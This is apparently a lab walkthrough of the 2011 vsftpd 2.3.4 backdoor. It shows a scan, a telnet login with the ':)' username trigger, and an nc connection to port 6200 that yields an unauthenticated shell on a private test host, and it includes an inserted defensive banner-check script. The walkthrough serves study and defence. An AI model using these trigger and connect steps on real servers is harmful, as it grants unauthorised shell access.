Manual vsFTPd Vulnerability Exploitation

vsftpd (Very Secure FTP Daemon) is an FTP server for Unix-like systems, including Linux. It is the default FTP server in the Ubuntu, CentOS, Fedora, NimbleX, Slackware and RHEL Linux distributions.

nmap -p0-65535 192.168.2.129

[Image: nmap scan output]

root@kali:~# telnet 192.168.2.129 21
Trying 192.168.2.129...
Connected to 192.168.2.129.
Escape character is '^]'.
220 (vsFTPd 2.3.4)

In July 2011, it was discovered that the vsftpd version 2.3.4 tarball downloadable from the master site had been compromised. Users logging into a compromised vsftpd-2.3.4 server could issue a ":)" smiley face as the username and gain a command shell on port 6200. This was not a security hole in vsftpd itself; instead, someone had uploaded a different version of vsftpd which contained a backdoor. Since then, the download site has been moved to Google App Engine.
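A defender's first question is which hosts still announce the affected release. The following is an added example (not code from the original post) that reads the FTP greeting the same way the telnet session above does and flags the exact banner string "220 (vsFTPd 2.3.4)". The host address and port are assumptions; the banner text is taken from the post.

```python
import re
import socket

# Greeting the trojaned release prints (copied from the telnet session in the post).
BACKDOORED_BANNER = "220 (vsFTPd 2.3.4)"

# vsFTPd's default greeting: "220 (vsFTPd <version>)".  Other banners mean the
# administrator set ftpd_banner, so the version cannot be read this way.
_BANNER_RE = re.compile(r"^220[ -]\(vsFTPd ([0-9]+(?:\.[0-9]+)*)\)")


def parse_vsftpd_version(banner: str):
    """Return the version from a default vsFTPd greeting, or None if it is not one."""
    m = _BANNER_RE.match(banner.strip())
    return m.group(1) if m else None


def is_backdoored_release(banner: str) -> bool:
    """True only for the 2.3.4 release whose upstream tarball was trojaned in July 2011."""
    return parse_vsftpd_version(banner) == "2.3.4"


def grab_banner(host: str, port: int = 21, timeout: float = 5.0) -> str:
    """Read the first line the FTP server sends after the TCP connection opens."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        # FTP replies are CRLF-terminated ASCII; one readline() is the greeting.
        f = s.makefile("r", encoding="ascii", errors="replace", newline="\r\n")
        return f.readline().rstrip("\r\n")


if __name__ == "__main__":
    import sys

    # Assumed target for a stand-alone run; the post's lab host is used as the default.
    host = sys.argv[1] if len(sys.argv) > 1 else "192.168.2.129"
    banner = grab_banner(host)
    version = parse_vsftpd_version(banner)
    print(f"{host}: banner={banner!r} version={version}")
    if is_backdoored_release(banner):
        print("WARNING: banner matches the July 2011 backdoored vsftpd 2.3.4 release; "
              "verify the binary's origin and watch for a listener on TCP 6200")
```

Two caveats apply to any banner check. Distribution-built 2.3.4 packages were compiled from clean sources, so a matching banner means "verify the binary", not "compromised"; and a server configured with ftpd_banner hides its version entirely, so a None result is "unknown", not "safe".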

Let's try to exploit it without Metasploit.

Connect to the vsFTPd server and send a USER name and a PASS command.

Note: the user name should end with the smiley ":)".

Whenever a user logs in to the vsFTPd server with the smiley in the user name, the backdoor is triggered and a listener is opened on port 6200 of the FTP server.

root@kali:~# telnet 192.168.2.129 21
Trying 192.168.2.129...
Connected to 192.168.2.129.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
USER invalid:)
331 Please specify the password.
PASS dont know
^]
telnet> quit
Connection closed.

Close the telnet session and connect back to port 6200 using netcat or telnet.

nc 192.168.2.129 6200

or

telnet 192.168.2.129 6200

It allows the user to connect to the vsFTPd server without any authentication.

[Image: connection to port 6200]

Done 🙂
